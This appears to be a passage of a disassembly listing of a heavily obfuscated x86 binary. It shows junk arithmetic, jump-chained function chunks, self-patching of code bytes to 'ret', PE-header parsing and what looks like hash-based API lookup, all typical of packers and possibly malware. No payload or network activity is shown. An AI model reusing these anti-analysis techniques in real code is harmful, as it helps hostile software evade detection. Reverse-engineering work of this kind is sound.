		sub	ebx, 0CEABBCCCh
		jmp	sub_451634
; ---------------------------------------------------------------------------

loc_453F53:				; CODE XREF: y2kk37jd:loc_4596BEj
					; y2kk37jd:004596DEj
		sub	esi, 0E28E4DBDh
		add	esi, 65A77E97h
		popf
		xchg	esi, [esp]
		jmp	loc_4447E0
; ---------------------------------------------------------------------------

loc_453F68:				; CODE XREF: y2kk37jd:00455E3Ej
		or	ebp, 0DAD3CBD9h
		adc	edi, 522541CCh
		jmp	loc_43B521
; ---------------------------------------------------------------------------
		mov	eax, 637A7446h
		push	esi
		push	0DD833627h
		pop	esi
		and	esi, 0F673C85Dh
		xor	esi, 4838D787h
		add	esi, 64087561h
		xchg	esi, [esp]
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_453F9F:				; CODE XREF: sub_44CF38:loc_4512CBj
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------

loc_453FA1:				; CODE XREF: y2kk37jd:0044CFA4j
		mov	eax, [ebp-4]
		mov	eax, [eax]
		jmp	loc_43B00E

; =============== S U B	R O U T	I N E =======================================



sub_453FAB	proc near		; CODE XREF: y2kk37jd:00446253p
					; y2kk37jd:00457A67j

; FUNCTION CHUNK AT 004585D4 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		push	offset loc_4457FB
		jmp	loc_4585D4
sub_453FAB	endp


; =============== S U B	R O U T	I N E =======================================



sub_453FBA	proc near		; CODE XREF: sub_4554A3-18F19p
					; y2kk37jd:00443285j

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BC08 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B4F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451E69 SIZE 00000015 BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		call	sub_442C3E
		xor	eax, 787C63C5h
		rol	eax, 1Fh
		jmp	loc_44B4F9
sub_453FBA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_453FD1:				; CODE XREF: y2kk37jd:00457976j
					; y2kk37jd:0045C541j
		xchg	eax, edi
		and	ecx, 0BBD4A471h
		or	edi, ebx
		and	ecx, 3AED0F1Ah

loc_453FE1:				; CODE XREF: y2kk37jd:loc_4485ADj
		mov	eax, [ebp-4]
		jmp	loc_44361C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44291B

loc_453FE9:				; CODE XREF: sub_44291B+170D7j
		jge	loc_449E2E
		sub	edx, eax
		jmp	loc_449E2D
; END OF FUNCTION CHUNK	FOR sub_44291B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447832

loc_453FF6:				; CODE XREF: sub_447832:loc_447840j
		push	1BEEBE72h
		pop	edi
		or	edi, 0C6F5257Fh
		rol	edi, 2
		or	edi, 0ADFF8CEAh
		rol	edi, 17h
		jmp	loc_43B369
; END OF FUNCTION CHUNK	FOR sub_447832
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_454013:				; CODE XREF: sub_453867:loc_43E78Fj
					; sub_43C851+2429j ...
		push	offset loc_44351D
		jmp	loc_456BF2
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455613

loc_45401D:				; CODE XREF: sub_455613-45A2j
		pop	edi
		mov	[ebp-24h], eax

loc_454021:				; CODE XREF: sub_44D5ED:loc_4533F6j
		mov	eax, [ebp-24h]
		push	offset loc_44D1F1
		jmp	loc_43C7B4
; END OF FUNCTION CHUNK	FOR sub_455613
; ---------------------------------------------------------------------------
		test	ecx, edi
		jmp	loc_44B943
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_454035:				; CODE XREF: sub_43F8B8-439Cj
		jnb	loc_444445

loc_45403B:				; CODE XREF: sub_4543B8:loc_4559BAj
		mov	eax, [esp+0Ch+var_C]
		call	sub_44AD49

loc_454043:				; CODE XREF: y2kk37jd:00450C6Dj
					; sub_4543B8+8j
		push	offset sub_452912
		jmp	loc_44EA30
; END OF FUNCTION CHUNK	FOR sub_43F8B8

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_45404D	proc near		; CODE XREF: sub_4448C1:loc_445874j
		retn
sub_45404D	endp

; ---------------------------------------------------------------------------

loc_45404E:				; CODE XREF: y2kk37jd:0043F157j
		jmp	loc_441646
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_454053:				; CODE XREF: sub_43B0F5+1100Cj
					; sub_43B0F5+1DBB3j
		inc	dword ptr [ebp-8]
		inc	dword ptr [ebp-0Ch]
		jmp	loc_45A768
; END OF FUNCTION CHUNK	FOR sub_43B0F5

; =============== S U B	R O U T	I N E =======================================



sub_45405E	proc near		; CODE XREF: sub_43B4A5+Dj
					; y2kk37jd:0043C6E0p ...

; FUNCTION CHUNK AT 0043B243 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00457A06 SIZE 00000005 BYTES

		call	sub_4567FD

loc_454063:				; CODE XREF: y2kk37jd:0044C3EFj
		jmp	loc_43B243
sub_45405E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_454068:				; CODE XREF: sub_4447EA:loc_4523BEj
		jnz	loc_45827B
		jmp	loc_447500
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_454073:				; CODE XREF: sub_43B163:loc_442CFCj
		push	edx
		call	sub_4599BE
		mov	eax, 3195933h
		push	ebx
		push	271E51EBh
		pop	ebx
		rol	ebx, 0Bh
		jmp	loc_458DB7
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_45408D:				; CODE XREF: sub_448DCA:loc_44692Cj
		jz	loc_44D8A1
		jmp	loc_458B3A
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_454098:				; CODE XREF: sub_45689F:loc_444F5Cj
		jz	loc_457BFB
		rol	ecx, 1Ch
		jmp	loc_457BF9
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_4540A6:				; CODE XREF: sub_448700:loc_458650j
		add	ebx, 4D82F2D1h
		xor	ebx, 1E341BD9h
		sub	ebx, 0B69CF1DEh
		add	ebx, 4A17AD79h
		jmp	loc_4460AA
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F4CE

loc_4540C3:				; CODE XREF: sub_43F4CE+Ej
		push	edi
		mov	edi, eax
		push	offset loc_445286
		jmp	loc_4461E2
; END OF FUNCTION CHUNK	FOR sub_43F4CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BB7

loc_4540D0:				; CODE XREF: sub_444BB7:loc_44748Dj
		or	edx, 0B0651324h
		add	edx, 97016BA3h
		add	eax, edx
		pop	edx
		ror	eax, 16h
		add	eax, 73E1B17Dh
		push	offset loc_454FD5
		jmp	nullsub_191
; END OF FUNCTION CHUNK	FOR sub_444BB7

; =============== S U B	R O U T	I N E =======================================



sub_4540F2	proc near		; CODE XREF: y2kk37jd:0044258Fj
					; sub_4502E6+7CB7p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045C639 SIZE 0000000C BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edx, [esp-4+arg_0]
		jmp	loc_45C639
sub_4540F2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	[edx], ebx
		jmp	loc_44B557
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_454105:				; CODE XREF: sub_446718+107E0j
		jge	loc_45549E

loc_45410B:				; CODE XREF: sub_4490B4:loc_43BE1Cj
					; sub_446718:loc_456EEAj
		add	eax, 0E0FE72BDh
		popf
		xchg	eax, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459703

loc_45411A:				; CODE XREF: y2kk37jd:loc_43F457j
					; sub_459703:loc_45B414j
		mov	[ecx], eax
		pop	ecx
		mov	eax, [ebp-4]
		call	sub_440D81

loc_454125:				; CODE XREF: y2kk37jd:0043FED2j
		jmp	nullsub_22
; END OF FUNCTION CHUNK	FOR sub_459703
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45412A:				; CODE XREF: sub_445226:loc_448262j
		push	10A64355h
		xchg	edx, [esp+10h+var_10]
		mov	eax, edx
		pop	edx
		and	eax, 0D298ACCh
		or	eax, 140F3525h
		jmp	loc_451E90
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_45414C:				; CODE XREF: sub_44001E+A99Ej
		jmp	loc_450186
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_454151:				; CODE XREF: sub_45A961:loc_4443B3j
		jmp	loc_4547E4
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_454156:				; CODE XREF: sub_44610D-4835j
		jmp	loc_441793
; END OF FUNCTION CHUNK	FOR sub_44610D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		or	al, 24h
		call	sub_458B55

loc_454163:				; CODE XREF: y2kk37jd:00444BFEj
		jmp	nullsub_502
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_454168:				; CODE XREF: sub_44B924:loc_45C3E3j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0E8h
		jnz	loc_456E9C
		mov	eax, [ebp-4]
		inc	eax
		mov	eax, [eax]
		jmp	loc_457E7C
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------

loc_45417F:				; CODE XREF: y2kk37jd:00453E3Dj
		jl	loc_453094
		xchg	eax, ebp

; =============== S U B	R O U T	I N E =======================================



sub_454187	proc near		; CODE XREF: sub_44C1F2+Ap

; FUNCTION CHUNK AT 004462E0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045BBEE SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	eax
		jmp	loc_45BBEE
sub_454187	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454251

loc_454191:				; CODE XREF: sub_454251-E3FEj
		xchg	ecx, eax
		jmp	loc_44EFE7
; END OF FUNCTION CHUNK	FOR sub_454251
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_454198:				; CODE XREF: sub_4448E2:loc_453DCEj
		and	eax, 454A7848h
		add	eax, 7C4BC592h
		or	eax, 0C3CD40BAh
		add	eax, 3C66967Ah
		xchg	eax, [esp+0Ch+var_C]
		jmp	loc_44E03D
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_4541B8:				; CODE XREF: y2kk37jd:0043E6E7j
		js	loc_44591B
		push	edx
		jnz	loc_44C9F6
		pushf
		jmp	loc_4553CC
; ---------------------------------------------------------------------------
		mov	ecx, eax
		jmp	loc_440751
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_4541D2:				; CODE XREF: sub_4424B0+C72Ej
		jz	loc_459C4E
		jmp	loc_442B8A
; END OF FUNCTION CHUNK	FOR sub_4424B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F42

loc_4541DD:				; CODE XREF: sub_442F42:loc_44F74Fj
		mov	ds:off_41E048, eax
		lea	eax, sub_442F42
		mov	byte ptr [eax],	0C3h
		jmp	loc_4454C3
; ---------------------------------------------------------------------------

loc_4541F1:				; CODE XREF: sub_442F42+1j
		mov	eax, [esp-4+arg_0]
		push	edx
		push	esi
		jmp	loc_4455E6
; END OF FUNCTION CHUNK	FOR sub_442F42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_4541FB:				; CODE XREF: sub_44AD49:loc_447D5Aj
		call	sub_450CFC

loc_454200:				; CODE XREF: sub_4507BF-5A8Cj
		jmp	loc_44158C
; END OF FUNCTION CHUNK	FOR sub_44AD49
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_363. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_454206:				; CODE XREF: sub_44CF38-2090j
		jmp	nullsub_317
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45420B:				; CODE XREF: sub_4411C3+1348j
		jmp	loc_44C993
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_454210	proc near		; CODE XREF: y2kk37jd:0044A19Aj
					; sub_453B0B+1p

; FUNCTION CHUNK AT 0044B7B7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E99A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00455FB1 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	2F153A9h
		pop	ebx
		add	ebx, 2A559823h
		jmp	loc_44B7B7
sub_454210	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C5E9

loc_454225:				; CODE XREF: sub_44C5E9:loc_44C5F4j
		mov	byte ptr [eax],	0C3h
		jmp	sub_45866A
; END OF FUNCTION CHUNK	FOR sub_44C5E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45866A

loc_45422D:				; CODE XREF: sub_45866A+1j
		call	sub_45709E

loc_454232:				; CODE XREF: y2kk37jd:004539DAj
		jmp	loc_4405B6
; END OF FUNCTION CHUNK	FOR sub_45866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44704D

loc_454237:				; CODE XREF: sub_44704D+F446j
		cmp	dword ptr [ebp-4], 0
		jz	loc_459FF4
		mov	eax, [ebp-4]
		add	eax, 3Ch
		mov	eax, [eax]

loc_454249:				; CODE XREF: y2kk37jd:0043D753j
		add	eax, [ebp-4]
		jmp	loc_440F9C
; END OF FUNCTION CHUNK	FOR sub_44704D

; =============== S U B	R O U T	I N E =======================================



sub_454251	proc near		; CODE XREF: y2kk37jd:0044B1FDp
					; sub_448797+2A8Cj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00445E32 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00447C21 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044C473 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EFE7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450A8D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453E95 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454191 SIZE 00000007 BYTES

		xchg	eax, [esp-4+arg_0]
		pop	eax
		mov	eax, [esp+0]
		push	edx
		call	sub_43C326
		push	0C24ACA8Eh
		jmp	loc_44C473
sub_454251	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_454268:				; CODE XREF: sub_44CF09-106DDj
		test	eax, 6D655667h
		jmp	loc_44E04A
; END OF FUNCTION CHUNK	FOR sub_44CF09

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_454273	proc near		; CODE XREF: sub_443BAF+11042j
		retn
sub_454273	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2D2

loc_454274:				; CODE XREF: sub_43E2D2+14386j
		jmp	loc_43E2E2
; END OF FUNCTION CHUNK	FOR sub_43E2D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CA

loc_454279:				; CODE XREF: sub_4424CA+14j
		jz	loc_43EFBD
		jmp	loc_4430FE
; END OF FUNCTION CHUNK	FOR sub_4424CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_454284:				; CODE XREF: sub_451634:loc_45458Ej
		or	edi, 0FD8AF5Ch
		test	edi, 1
		jmp	loc_43CABE
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_454295:				; CODE XREF: sub_456D3F+Cj
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D4CE

loc_454297:				; CODE XREF: sub_43D4CE+16j
		jmp	loc_43C141
; END OF FUNCTION CHUNK	FOR sub_43D4CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_45429C:				; CODE XREF: sub_456D3F+4j
		mov	eax, [ebp-4]
		mov	al, [eax]
		sub	al, 99h
		jmp	loc_45B5F2
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447977

loc_4542A8:				; CODE XREF: sub_447977-AD26j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_447977
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2EA

loc_4542AA:				; CODE XREF: sub_43E2EA+9j
		jmp	loc_43DA52
; END OF FUNCTION CHUNK	FOR sub_43E2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_4542AF:				; CODE XREF: sub_44753E:loc_43C38Bj
					; sub_449C4F+3B3Dj ...
		inc	dword ptr [ebp-20h]
		dec	dword ptr [ebp-2Ch]
		jnz	loc_449E75
		jmp	loc_457D84
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------

loc_4542C0:				; CODE XREF: y2kk37jd:00450C73j
		jz	loc_442999
		jmp	loc_45C61E
; ---------------------------------------------------------------------------
		mov	edx, 75FF22C5h
		xchg	edi, eax
		jmp	sub_452A28
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_4542D7:				; CODE XREF: sub_44F641+1j
					; y2kk37jd:00451155j
		mov	eax, [esp+0]
		push	edx
		push	edx
		push	0C4760AEEh
		jmp	loc_43FF34
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4542E6:				; CODE XREF: sub_45B7AA-1CF45j
		rol	ecx, 1Ah

loc_4542E9:				; CODE XREF: sub_45B7AA:loc_45BC8Bj
		call	sub_45405E
		call	sub_443DB8
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; START	OF FUNCTION CHUNK FOR sub_441718

loc_4542F3:				; CODE XREF: sub_441718+136F3j
		jmp	nullsub_158
; END OF FUNCTION CHUNK	FOR sub_441718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_4542F8:				; CODE XREF: sub_4507BF-407Aj
		jmp	loc_454BB2
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_4542FD:				; CODE XREF: sub_457524-1320Dj
		jmp	sub_447832
; END OF FUNCTION CHUNK	FOR sub_457524
; ---------------------------------------------------------------------------

loc_454302:				; CODE XREF: y2kk37jd:loc_450C79j
		push	offset sub_45181D
		jmp	locret_453BA7

; =============== S U B	R O U T	I N E =======================================



sub_45430C	proc near		; CODE XREF: sub_44D302:loc_43EDDDj

; FUNCTION CHUNK AT 00450845 SIZE 00000003 BYTES

		push	ebp
		mov	eax, [ebp-20h]
		call	sub_45651A
		pop	ecx
		jmp	loc_450845
sub_45430C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_45431B:				; CODE XREF: sub_44D302:loc_443493j
		test	byte ptr [ebp-8], 2
		jz	loc_450848
		push	ebp
		mov	eax, [ebp-20h]
		jmp	loc_45083F
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------

loc_45432E:				; CODE XREF: y2kk37jd:loc_448100j
		sub	eax, 2CF15B9Bh
		test	eax, 10h
		jmp	loc_45940D

; =============== S U B	R O U T	I N E =======================================



sub_45433F	proc near		; CODE XREF: y2kk37jd:0043C4C0j
					; sub_454251-3A7p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00458C1F SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	esi, [esp-4+arg_0]
		jmp	loc_458C1F
sub_45433F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_45434B:				; CODE XREF: sub_454C24-D28j
		jle	loc_441423

loc_454351:				; CODE XREF: y2kk37jd:loc_45B0DCj
		call	nullsub_19
		retn
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45157A

loc_454357:				; CODE XREF: sub_45157A+Aj
		jmp	loc_450F4E
; END OF FUNCTION CHUNK	FOR sub_45157A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44948A

loc_45435D:				; CODE XREF: sub_44948A+1460j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44948A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E5E5

loc_454362:				; CODE XREF: sub_44E5E5-1011Cj
					; y2kk37jd:0044AE4Cj
		call	sub_4577FE
		push	offset word_4552D6
		jmp	nullsub_143
; END OF FUNCTION CHUNK	FOR sub_44E5E5

; =============== S U B	R O U T	I N E =======================================



sub_454371	proc near		; CODE XREF: sub_43D412+DD57p
					; y2kk37jd:004511A1j

; FUNCTION CHUNK AT 00441310 SIZE 0000000E BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0D767D74Ah
		pop	edx
		sub	edx, 0C00FBBD3h
		and	edx, 2A57DB6Ah
		jmp	loc_441310
sub_454371	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_45438C:				; CODE XREF: sub_44610D+4C0Ej
		mov	ebp, 715A82DCh

loc_454391:				; CODE XREF: sub_44610D:loc_442855j
		xor	eax, eax
		mov	[ebp-0Ch], eax
		push	offset loc_44449B

loc_45439B:				; CODE XREF: sub_45BC07:loc_43B9EEj
		jmp	loc_4481D9
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
		sbb	edx, 0CF2EAE09h
		test	ebp, 477A19F6h
		jmp	loc_43BFA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_4543B1:				; CODE XREF: sub_448CAE:loc_455ACEj
		xchg	edx, [ebx]

loc_4543B3:				; CODE XREF: y2kk37jd:loc_44CFB5j
		jmp	loc_44E05F
; END OF FUNCTION CHUNK	FOR sub_448CAE

; =============== S U B	R O U T	I N E =======================================



sub_4543B8	proc near		; DATA XREF: sub_455B08-1316Co

; FUNCTION CHUNK AT 004559BA SIZE 0000000B BYTES

		push	eax
		call	sub_4476EE
		or	eax, eax
		jnz	loc_454043
		jmp	loc_4559BA
sub_4543B8	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_381. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C044

loc_4543CC:				; CODE XREF: sub_43C044+9724j
		jmp	sub_45866A
; END OF FUNCTION CHUNK	FOR sub_43C044
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FDF

loc_4543D1:				; CODE XREF: sub_440FDF:loc_446E9Cj
		lea	eax, nullsub_456
		mov	byte ptr [eax],	0C3h
		jmp	loc_44F3F0
; END OF FUNCTION CHUNK	FOR sub_440FDF

; =============== S U B	R O U T	I N E =======================================



sub_4543DF	proc near		; CODE XREF: sub_406043+47p
					; sub_4543DF+5j
					; DATA XREF: ...
		call	sub_4543EF
		jmp	ds:off_41E160
sub_4543DF	endp

; ---------------------------------------------------------------------------

loc_4543EA:				; CODE XREF: y2kk37jd:0045757Dj
		jmp	loc_45AD52

; =============== S U B	R O U T	I N E =======================================



sub_4543EF	proc near		; CODE XREF: sub_4415E3+3j sub_4543DFp ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C537 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004415EB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443EBB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453437 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E06 SIZE 00000005 BYTES

		jnz	loc_4415EB
		pop	edx
		push	offset sub_452884
		jmp	loc_457E06
sub_4543EF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_454400	proc near		; DATA XREF: y2kk37jd:00451BB9o
		add	ebx, 39306CD8h
		mov	[ebx], eax
		pop	ebx
		push	offset loc_4556D0
		jmp	nullsub_524
sub_454400	endp


; =============== S U B	R O U T	I N E =======================================



sub_454413	proc near		; CODE XREF: sub_44F7EA-14650p
					; sub_458F91:loc_43FF9Cj ...

; FUNCTION CHUNK AT 0043DB99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DD59 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004415DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A96 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442058 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 004430BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004451CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445986 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447277 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00448B8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A86A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B761 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E116 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453083 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004531D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453715 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004538F9 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00453C2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004565EE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456953 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458A23 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004595F4 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00459DA5 SIZE 00000014 BYTES

		jns	sub_459158
		push	ebp
		mov	ebp, esp
		push	edx
		jmp	loc_4531D1
sub_454413	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_454422:				; CODE XREF: sub_45136B:loc_445E77j
		mov	edx, [ebp-18h]
		cmp	eax, [edx+18h]
		jnb	loc_4542AF
		jmp	loc_44E26A
; END OF FUNCTION CHUNK	FOR sub_45136B

; =============== S U B	R O U T	I N E =======================================



sub_454433	proc near		; DATA XREF: sub_458983o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CDE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CC6E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045539C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458655 SIZE 0000000F BYTES

		push	edi
		push	32D3CBBAh
		pop	edi
		add	edi, 0F1F50FAAh
		and	edi, 980B70A8h
		jmp	loc_45539C
sub_454433	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45444B:				; CODE XREF: y2kk37jd:0043B73Cj
		popf
		mov	edx, eax
		jmp	loc_43FCCE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_361. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_454454	proc near		; DATA XREF: y2kk37jd:00448DB4o
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_455EE9

loc_454460:				; CODE XREF: y2kk37jd:0043D03Cj
		mov	edx, [ebx+ecx]
		xor	edx, [ebx+ecx+4]
		cmp	edx, 7C61090Eh
		jmp	loc_455EE3
sub_454454	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A12

loc_454472:				; CODE XREF: sub_448A12:loc_446A12j
		mov	ebx, [eax+18h]
		mov	ecx, [ebx+3Ch]
		jmp	loc_440318
; END OF FUNCTION CHUNK	FOR sub_448A12

; =============== S U B	R O U T	I N E =======================================



sub_45447D	proc near		; CODE XREF: y2kk37jd:0043E60Ej
					; sub_45B7AA:loc_4533E7p

